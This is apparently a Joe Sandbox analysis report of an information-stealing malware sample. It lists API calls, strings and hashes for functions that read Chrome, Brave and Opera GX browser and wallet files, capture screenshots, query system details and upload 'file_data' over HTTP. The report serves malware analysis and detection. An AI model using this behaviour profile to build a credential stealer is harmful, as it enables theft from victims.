lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,0076b6a02eb028dde461f6494f955b49,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

------, xrefs: 00405B5D
------, xrefs: 0040589D
0076b6a02eb028dde461f6494f955b49, xrefs: 004059A7
ERROR, xrefs: 00405D79
block, xrefs: 00405E30
file_data, xrefs: 00405C09
ERROR, xrefs: 00405F2F
", xrefs: 0040581B
------, xrefs: 0040573C
------, xrefs: 004059FF
------, xrefs: 00405605
build_id, xrefs: 0040594F
--, xrefs: 00405600
", xrefs: 00405C35
", xrefs: 00405AD8
", xrefs: 0040597B

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$0076b6a02eb028dde461f6494f955b49$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-116144764
Opcode ID: 0de01086ab485e55b7f528bc59f3edc23371bce8bdf709be377feb1ef02c9e11
Instruction ID: 2ea3bf00dbdfd503c2dd9f7f16266cf6fe94f368181271438dc828a8fece2da0
Opcode Fuzzy Hash: 0de01086ab485e55b7f528bc59f3edc23371bce8bdf709be377feb1ef02c9e11
Instruction Fuzzy Hash: 99420671D4016D9ADF21FB21DC45BDDB7B9BF04304F0085E6A548B3162DAB46ECA9F88

Function 00414A92 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414AE6
FindFirstFileA.KERNEL32(?,?), ref: 00414AFD
_memset.LIBCMT ref: 00414B19
_memset.LIBCMT ref: 00414B2A
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414B4B
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414B65
wsprintfA.USER32 ref: 00414B8C
StrCmpCA.SHLWAPI(?,004365D7), ref: 00414BA0
wsprintfA.USER32 ref: 00414BC9
wsprintfA.USER32 ref: 00414BE0

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(vMA,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414D76,?), ref: 00412181

_memset.LIBCMT ref: 00414BF2
lstrcatA.KERNEL32(?,?), ref: 00414C07
strtok_s.MSVCRT ref: 00414C4C
_memset.LIBCMT ref: 00414C5E
lstrcatA.KERNEL32(?,?), ref: 00414C73
strtok_s.MSVCRT ref: 00414C8C
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414CA1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414D80
strtok_s.MSVCRT ref: 00414DB1
FindNextFileA.KERNELBASE(?,?), ref: 00414ECF
FindClose.KERNEL32(?), ref: 00414EEF

Strings

%s\%s, xrefs: 00414B86
%s\%s\%s, xrefs: 00414BC3
%s\*.*, xrefs: 00414ADA
%s\%s, xrefs: 00414BDA

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 6bea43fde637984bd19a5eecd2e190457a38d7bea891b918677a234953c67dda
Instruction ID: 3bc842c7f4ee78436131fc2d80153172fc1ce14c8399e4a1c5caf68e1eb91f55
Opcode Fuzzy Hash: 6bea43fde637984bd19a5eecd2e190457a38d7bea891b918677a234953c67dda
Instruction Fuzzy Hash: E2C11BB1E0021AAFCF21EB65DC45AEE77BDAF48305F0140A6B609B3151DB789F858F58

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371C4,004367C3,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416DAB: CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
Part of subcall function 00416DAB: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 5184e35fcd9b258e88f21be6e264783b06a4a97d1eecef0e15cf2e206d06df4e
Instruction ID: 0a9a135691bb782c711ba97fd02cca426a6fcaad6ab3d7a9e08618d5ad51c407
Opcode Fuzzy Hash: 5184e35fcd9b258e88f21be6e264783b06a4a97d1eecef0e15cf2e206d06df4e
Instruction Fuzzy Hash: 4AE12C71A00209AFCF01FBA1ED4AADD7B76EF04309F10406AF541B71A1DB786E859B98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367E6,004367E3,00437324,004367E2,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367E7), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367E7), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(?), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,0043738C,004367EE), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,004373A0,004367EF), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366D6,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Opera GX, xrefs: 00409E8B
Preferences, xrefs: 0040A023
\BraveWallet\Preferences, xrefs: 0040A105
Brave, xrefs: 0040A00D
Google Chrome, xrefs: 0040A4B9

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 46239fc16633af52bcdb8e80084291e1575abeb4646319295f554ccc6da629e5
Instruction ID: 133650d40f39a39151150ed4416eafcfe3172694b9992fa4a376cea1052e7576
Opcode Fuzzy Hash: 46239fc16633af52bcdb8e80084291e1575abeb4646319295f554ccc6da629e5
Instruction Fuzzy Hash: C0421B319402299FCF21FB65DD46BCD7775AF04308F4101AAB948B31A1DB78AED98F89

Function 00415D9B Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00415DE2
FindFirstFileA.KERNEL32(?,?), ref: 00415DF9
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00415E1A
StrCmpCA.SHLWAPI(?,00436AB8), ref: 00415E34
wsprintfA.USER32 ref: 00415E5B
StrCmpCA.SHLWAPI(?,0043661D), ref: 00415E6F
wsprintfA.USER32 ref: 00415E8C
wsprintfA.USER32 ref: 00415EA3
PathMatchSpecA.SHLWAPI(?,?), ref: 00415EB9
lstrcatA.KERNEL32(?), ref: 00415EEF
lstrcatA.KERNEL32(?,00436AD0), ref: 00415F01
lstrcatA.KERNEL32(?,?), ref: 00415F14
lstrcatA.KERNEL32(?,00436AD4), ref: 00415F26
lstrcatA.KERNEL32(?,?), ref: 00415F3A
FindNextFileA.KERNEL32(?,?), ref: 004160C9
FindClose.KERNEL32(?), ref: 004160DD

Strings

%s\%s, xrefs: 00415E55
%s\*, xrefs: 00415DD6
%s\%s, xrefs: 00415E9D

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: 1ab59a4028aa8d9a95996cc5f1b1034379df8af7b0f9e2850f15e0aa6e55bb6c
Instruction ID: 3c8d677de9d0d12d8b0fcd209a742e736fe00529355ab6ddc12841444b6214e5
Opcode Fuzzy Hash: 1ab59a4028aa8d9a95996cc5f1b1034379df8af7b0f9e2850f15e0aa6e55bb6c
Instruction Fuzzy Hash: 2B812671D0022DAFCF60EB65DC45BCE7BB9BB08305F0180E6A549A3151DF79AE898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B008,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Strings

Unknown, xrefs: 0041196A
Unknown, xrefs: 00411971
Unknown, xrefs: 00411985
%d/%d/%d %d:%d:%d, xrefs: 00411943
WQL, xrefs: 0041189A
ROOT\CIMV2, xrefs: 00411862
Select * From Win32_OperatingSystem, xrefs: 00411895
InstallDate, xrefs: 004118ED

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: ec12869def1900d4e1cd34bab5b1d8ca4e9889291bb8581c7001597ce27c35de
Instruction ID: 459065b851f6ced5cfabd301d6bc95c5b842a93f0f05b5c317e199107dfb542d
Opcode Fuzzy Hash: ec12869def1900d4e1cd34bab5b1d8ca4e9889291bb8581c7001597ce27c35de
Instruction Fuzzy Hash: E8417C71940209BBCB209BD5DC89EEFBBBDEB89B11F20411AF611A6190C7789941CB28

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,0043694F,00436943,00436942,0043693F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: 36580c0a556aef022cd3bd30b9295f83c0d246cdcd39904958b3f7fa249de216
Instruction ID: 29c67eb21161fc1c596dca0028de27d8e6f5bd8fac4fde5349ff2bdc9c2a2b2e
Opcode Fuzzy Hash: 36580c0a556aef022cd3bd30b9295f83c0d246cdcd39904958b3f7fa249de216
Instruction Fuzzy Hash: 3B51D572800308AFDB11AFA1ED49AEEBFBAFF08316B144065F901E2120DB359D55DBA5

Function 00415207 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00415234
FindFirstFileA.KERNEL32(?,?), ref: 0041524B
StrCmpCA.SHLWAPI(?,00436A80), ref: 0041526C
StrCmpCA.SHLWAPI(?,00436A84), ref: 00415286
lstrcatA.KERNEL32(?), ref: 004152D7
lstrcatA.KERNEL32(?), ref: 004152EA
lstrcatA.KERNEL32(?,?), ref: 004152FE
lstrcatA.KERNEL32(?,?), ref: 00415311
lstrcatA.KERNEL32(?,00436A88), ref: 00415323
lstrcatA.KERNEL32(?,?), ref: 00415337

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416DAB: CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
Part of subcall function 00416DAB: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

FindNextFileA.KERNEL32(?,?), ref: 004153ED
FindClose.KERNEL32(?), ref: 00415401

Strings

%s\%s, xrefs: 00415228

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: d7abd2f1d3e31d68af85648043620988cd0df894e8726762b28a7fa20c398402
